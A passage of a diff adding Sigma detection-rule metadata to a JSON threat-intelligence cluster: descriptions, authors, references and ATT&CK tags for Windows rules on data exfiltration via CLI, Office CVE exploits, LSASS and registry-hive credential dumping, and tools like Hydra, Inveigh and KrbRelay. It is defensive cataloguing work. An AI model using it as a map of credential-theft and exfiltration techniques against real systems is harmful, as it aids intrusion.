"c75309a3-59f8-4a8d-9c2c-4c927ad50555", + "value": "Exfiltration and Tunneling Tools Execution" + }, + { + "description": "Detects the use of various cli utility related to web request exfiltrating data", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/02", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_exfil_data_via_cli.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exfil_data_via_cli.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "7d1aaf3d-4304-425c-b7c3-162055e0b3ab", + "value": "Possible Exfiltration Of Data Via CLI" + }, + { + "description": "Adversaries can use the inbuilt expand utility to decompress cab files as seen in recent Iranian MeteorExpress attack", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/07/30", + "falsepositive": [ + "System administrator Usage" + ], + "filename": "proc_creation_win_expand_cabinet_files.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://labs.sentinelone.com/meteorexpress-mysterious-wiper-paralyzes-iranian-trains-with-epic-troll", + "https://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218" + ] + }, + "uuid": "9f107a84-532c-41af-b005-8d12a607639f", + "value": "Cabinet File Expansion" + }, + { + "description": "Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/02/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_exploit_cve_2015_1641.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.virustotal.com/en/file/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8/analysis/", + "https://www.hybrid-analysis.com/sample/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2015_1641.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.005" + ] + }, + "uuid": "7993792c-5ce2-4475-a3db-a3a5539827ef", + "value": "Exploit for CVE-2015-1641" + }, + { + "description": "Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/02/22", + "falsepositive": [ + "Several false positives identified, check for suspicious file names or locations (e.g. Temp folders)" + ], + "filename": "proc_creation_win_exploit_cve_2017_0261.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2017/05/eps-processing-zero-days.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_0261.yml" + ], + "tags": [ + "attack.execution", + "attack.t1203", + "attack.t1204.002", + "attack.initial_access", + "attack.t1566.001" + ] + }, + "uuid": "864403a1-36c9-40a2-a982-4c9a45f7d833", + "value": "Exploit for CVE-2017-0261" + }, + { + "description": "Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/11/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_exploit_cve_2017_11882.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.hybrid-analysis.com/sample/2a4ae284c76f868fc51d3bb65da8caa6efacb707f265b25c30f34250b76b7507?environmentId=100", + "https://www.google.com/url?hl=en&q=https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about&source=gmail&ust=1511481120837000&usg=AFQjCNGdL7gVwLXaNSl2Td8ylDYbSJFmPw", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_11882.yml" + ], + "tags": [ + "attack.execution", + "attack.t1203", + "attack.t1204.002", + "attack.initial_access", + "attack.t1566.001" + ] + }, + "uuid": "678eb5f4-8597-4be6-8be7-905e4234b53a", + "value": "Droppers Exploiting CVE-2017-11882" + }, + { + "description": "Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/09/15", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_exploit_cve_2017_8759.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.hybrid-analysis.com/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100", + "https://www.reverse.it/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_8759.yml" + ], + "tags": [ + "attack.execution", + "attack.t1203", + "attack.t1204.002", + "attack.initial_access", + "attack.t1566.001" + ] + }, + "uuid": "fdd84c68-a1f6-47c9-9477-920584f94905", + "value": "Exploit for CVE-2017-8759" + }, + { + "description": "Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378", + "meta": { + "author": "Florian Roth, oscd.community, Jonhnathan Ribeiro", + "creation_date": "2019/11/15", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_exploit_cve_2019_1378.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.embercybersecurity.com/blog/cve-2019-1378-exploiting-an-access-control-privilege-escalation-vulnerability-in-windows-10-update-assistant-wua", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2019_1378.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068", + "attack.execution", + "attack.t1059.003", + "attack.t1574", + "cve.2019.1378" + ] + }, + "uuid": "1c373b6d-76ce-4553-997d-8c1da9a6b5f5", + "value": "Exploiting SetupComplete.cmd CVE-2019-1378" + }, + { + "description": "Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/11/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_exploit_cve_2019_1388.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1388", + "https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2019_1388.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068" + ] + }, + "uuid": "02e0b2ea-a597-428e-b04a-af6a1a403e5c", + "value": "Exploiting CVE-2019-1388" + }, + { + "description": "Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/03/25", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_exploit_cve_2020_10189.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html", + "https://vulmon.com/exploitdetails?qidtp=exploitdb&qid=48224", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2020_10189.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "attack.execution", + "attack.t1059.001", + "attack.t1059.003", + "attack.s0190", + "cve.2020.10189" + ] + }, + "uuid": "846b866e-2a57-46ee-8e16-85fa92759be7", + "value": "Exploited CVE-2020-10189 Zoho ManageEngine" + }, + { + "description": "Detects new commands that add new printer port which point to suspicious file", + "meta": { + "author": "EagleEye Team, Florian Roth", + "creation_date": "2020/05/13", + "falsepositive": [ + "New printer port install on host" + ], + "filename": "proc_creation_win_exploit_cve_2020_1048.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://windows-internals.com/printdemon-cve-2020-1048/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2020_1048.yml" + ], + "tags": [ + "attack.persistence", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "cc08d590-8b90-413a-aff6-31d1a99678d7", + "value": "Suspicious PrinterPorts Creation (CVE-2020-1048)" + }, + { + "description": "Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/07/15", + "falsepositive": [ + "Unknown but benign sub processes of the Windows DNS service dns.exe" + ], + "filename": "proc_creation_win_exploit_cve_2020_1350.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/", + "https://blog.menasec.net/2019/02/threat-hunting-24-microsoft-windows-dns.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2020_1350.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "attack.execution", + "attack.t1569.002" + ] + }, + "uuid": "b5281f31-f9cc-4d0d-95d0-45b91c45b487", + "value": "DNS RCE CVE-2020-1350" + }, + { + "description": "Detects signs of the exploitation of LPE CVE-2021-41379 to spawn a cmd.exe with LOCAL_SYSTEM rights", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/11/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_exploit_lpe_cve_2021_41379.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/klinix5/InstallerFileTakeOver", + "https://www.zerodayinitiative.com/advisories/ZDI-21-1308/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_lpe_cve_2021_41379.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068" + ] + }, + "uuid": "af8bbce4-f751-46b4-8d91-82a33a736f61", + "value": "Possible InstallerFileTakeOver LPE CVE-2021-41379" + }, + { + "description": "Detects the exploitation of PrinterNightmare to get a shell as LOCAL_SYSTEM", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/08/11", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_exploit_systemnightmare.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/GossiTheDog/SystemNightmare", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_systemnightmare.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068" + ] + }, + "uuid": "c01f7bd6-0c1d-47aa-9c61-187b91273a16", + "value": "SystemNightmare Exploitation Script Execution" + }, + { + "description": "Rename as a legitimate Sysinternals Suite tool to evade detection", + "meta": { + "author": "frack113", + "creation_date": "2021/12/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_false_sysinternalsuite.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_false_sysinternalsuite.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" + ] + }, + "uuid": "7cce6fc8-a07f-4d84-a53e-96e1879843c9", + "value": "False Sysinternals Suite Tools" + }, + { + "description": "Detects a file or folder's permissions being modified or tampered with.", + "meta": { + "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali", + "creation_date": "2019/10/23", + "falsepositive": [ + "Users interacting with the files on their own (unlikely unless privileged users).", + "Dynatrace app" + ], + "filename": "proc_creation_win_file_permission_modifications.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh750728(v=ws.11)", + "https://github.com/swagkarna/Defeat-Defender-V1.2.0", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_file_permission_modifications.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1222.001" + ] + }, + "uuid": "37ae075c-271b-459b-8d7b-55ad5f993dd8", + "value": "File or Folder Permissions Modifications" + }, + { + "description": "Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt.", + "meta": { + "author": "frack113", + "creation_date": "2021/12/27", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_findstr_gpp_passwords.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.006/T1552.006.md#atomic-test-1---gpp-passwords-findstr", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_gpp_passwords.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.006" + ] + }, + "uuid": "91a2c315-9ee6-4052-a853-6f6a8238f90d", + "value": "Findstr GPP Passwords" + }, + { + "description": "Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/08/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_findstr_lsass.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_lsass.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.006" + ] + }, + "uuid": "fe63010f-8823-4864-a96b-a7b4a0f7b929", + "value": "Findstr LSASS" + }, + { + "description": "Detects usage of findstr with the \"EVERYONE\" keyword. This is often used in combination with icacls to look for misconfigured files or folders permissions", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_findstr_recon_everyone.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_recon_everyone.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.006" + ] + }, + "uuid": "47e4bab7-c626-47dc-967b-255608c9a920", + "value": "Suspicious Recon Activity Using Findstr Keywords" + }, + { + "description": "Detects attempts to disable the Windows Firewall using PowerShell", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/14", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_firewall_disabled_via_powershell.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/windows-firewall-disabled-via-powershell.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_firewall_disabled_via_powershell.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562" + ] + }, + "uuid": "12f6b752-042d-483e-bf9c-915a6d06ad75", + "value": "Windows Firewall Disabled via PowerShell" + }, + { + "description": "Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.", + "meta": { + "author": "frack113, Florian Roth", + "creation_date": "2022/09/02", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_frp.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://asec.ahnlab.com/en/38156/", + "https://github.com/fatedier/frp", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_frp.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1090" + ] + }, + "uuid": "32410e29-5f94-4568-b6a3-d91a8adad863", + "value": "Fast Reverse Proxy (FRP)" + }, + { + "description": "Attackers may leverage fsutil to enumerated connected drives.", + "meta": { + "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", + "creation_date": "2022/03/29", + "falsepositive": [ + "Certain software or administrative tasks may trigger false positives." + ], + "filename": "proc_creation_win_fsutil_drive_enumeration.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "Turla has used fsutil fsinfo drives to list connected drives. https://attack.mitre.org/techniques/T1120/", + "https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/discovery_peripheral_device.toml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fsutil_drive_enumeration.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1120" + ] + }, + "uuid": "63de06b9-a385-40b5-8b32-73f2b9ef84b6", + "value": "Fsutil Drive Enumeration" + }, + { + "description": "A symbolic link is a type of file that contains a reference to another file.\nThis is probably done to make sure that the ransomware is able to follow shortcuts on the machine in order to find the original file to encrypt\n", + "meta": { + "author": "frack113", + "creation_date": "2022/03/02", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_fsutil_symlinkevaluation.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware", + "https://docs.microsoft.com/fr-fr/windows-server/administration/windows-commands/fsutil-behavior", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fsutil_symlinkevaluation.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "c0b2768a-dd06-4671-8339-b16ca8d1f27f", + "value": "Fsutil Behavior Set SymlinkEvaluation" + }, + { + "description": "Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/10", + "falsepositive": [ + "Administrative activity" + ], + "filename": "proc_creation_win_get_localgroup_member_recon.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_get_localgroup_member_recon.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.001" + ] + }, + "uuid": "c8a180d6-47a3-4345-a609-53f9c3d834fc", + "value": "Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet" + }, + { + "description": "Detects the execution GMER tool based on image and hash fields.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/05", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_gmer_execution.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "http://www.gmer.net/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gmer_execution.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "9082ff1f-88ab-4678-a3cc-5bcff99fc74d", + "value": "GMER - Rootkit Detector and Remover Execution" + }, + { + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "meta": { + "author": "frack113", + "creation_date": "2022/02/13", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_gotoopener.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gotoopener.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "b6d98a4f-cef0-4abf-bbf6-24132854a83d", + "value": "Use of GoToAssist Remote Access Software" + }, + { + "description": "Detects usage of the Gpg4win to decrypt files located in suspicious locations from CLI", + "meta": { + "author": "Nasreddine Bencherchali, X__Junior", + "creation_date": "2022/11/30", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_gpg4win_susp_usage.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gpg4win_susp_usage.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "e1e0b7d7-e10b-4ee4-ac49-a4bda05d320d", + "value": "Gpg4Win Decrypt Files From Suspicious Locations" + }, + { + "description": "Dump sam, system or security hives using REG.exe utility", + "meta": { + "author": "Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/22", + "falsepositive": [ + "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" + ], + "filename": "proc_creation_win_grabbing_sensitive_hives_via_reg.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://eqllib.readthedocs.io/en/latest/analytics/aed95fc6-5e3f-49dc-8b35-06508613f979.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md", + "https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_grabbing_sensitive_hives_via_reg.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "car.2013-07-001" + ] + }, + "uuid": "fd877b94-9bb5-4191-bb25-d79cbd93c167", + "value": "Grabbing Sensitive Hives via Reg Utility" + }, + { + "description": "Detects the use of Windows hacktools based on their import hash (imphash) even if the files have been renamed", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/04", + "falsepositive": [ + "Legitimate use of one of these tools" + ], + "filename": "proc_creation_win_hacktool_imphashes.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hacktool_imphashes.yml" + ], + "tags": "No established tags" + }, + "uuid": "24e3e58a-646b-4b50-adef-02ef935b9fc8", + "value": "Windows Hacktool Imphash" + }, + { + "description": "Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/07/31", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_hack_adcspwn.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/bats3c/ADCSPwn", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_adcspwn.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1557.001" + ] + }, + "uuid": "cd8c163e-a19b-402e-bdd5-419ff5859f12", + "value": "ADCSPwn Hack Tool" + }, + { + "description": "Detects command line parameters used by Bloodhound and Sharphound hack tools", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/12/20", + "falsepositive": [ + "Other programs that use these command line option and accepts an 'All' parameter" + ], + "filename": "proc_creation_win_hack_bloodhound.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/BloodHoundAD/BloodHound", + "https://github.com/BloodHoundAD/SharpHound", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_bloodhound.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.001", + "attack.t1069.002", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "f376c8a7-a2d0-4ddc-aa0c-16c17236d962", + "value": "Bloodhound and Sharphound Hack Tool" + }, + { + "description": "Detects the use of tools created by a well-known hacktool producer named Cube0x0, which includes his handle in all binaries as company information in the PE headers (SharpPrintNightmare, KrbRelay, SharpMapExec etc.)", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/04/27", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_hack_cube0x0_tools.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/cube0x0", + "https://www.virustotal.com/gui/search/metadata%253ACube0x0/files", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_cube0x0_tools.yml" + ], + "tags": "No established tags" + }, + "uuid": "37c1333a-a0db-48be-b64b-7393b2386e3b", + "value": "Hacktool by Cube0x0" + }, + { + "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/02/04", + "falsepositive": [ + "Very unlikely" + ], + "filename": "proc_creation_win_hack_dumpert.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/outflanknl/Dumpert", + "https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_dumpert.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "2704ab9e-afe2-4854-a3b1-0c0706d03578", + "value": "Dumpert Process Dumper" + }, + { + "description": "Detects command line parameters used by Hydra password guessing hack tool", + "meta": { + "author": "Vasiliy Burov", + "creation_date": "2020/10/05", + "falsepositive": [ + "Software that uses the caret encased keywords PASS and USER in its command line" + ], + "filename": "proc_creation_win_hack_hydra.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/vanhauser-thc/thc-hydra", + "https://attack.mitre.org/techniques/T1110/001/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_hydra.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1110", + "attack.t1110.001" + ] + }, + "uuid": "aaafa146-074c-11eb-adc1-0242ac120002", + "value": "Hydra Password Guessing Hack Tool" + }, + { + "description": "Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/24", + "falsepositive": [ + "Very unlikely" + ], + "filename": "proc_creation_win_hack_inveigh.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/Kevin-Robertson/Inveigh", + "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_inveigh.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "b99a1518-1ad5-4f65-bc95-1ffff97a8fd0", + "value": "Inveigh Hack Tool" + }, + { + "description": "Detects command line parameters used by Koadic hack tool", + "meta": { + "author": "wagga, Jonhnathan Ribeiro, oscd.community", + "creation_date": "2020/01/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_hack_koadic.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://unit42.paloaltonetworks.com/unit42-sofacy-groups-parallel-attacks/", + "https://github.com/offsecginger/koadic/blob/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/data/stager/js/stdlib.js", + "https://blog.f-secure.com/hunting-for-koadic-a-com-based-rootkit/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_koadic.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.007" + ] + }, + "uuid": "5cddf373-ef00-4112-ad72-960ac29bac34", + "value": "Koadic Execution" + }, + { + "description": "Detects the use of KrbRelay, a Kerberos relaying tool", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/04/27", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_hack_krbrelay.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/cube0x0/KrbRelay", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_krbrelay.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1558.003" + ] + }, + "uuid": 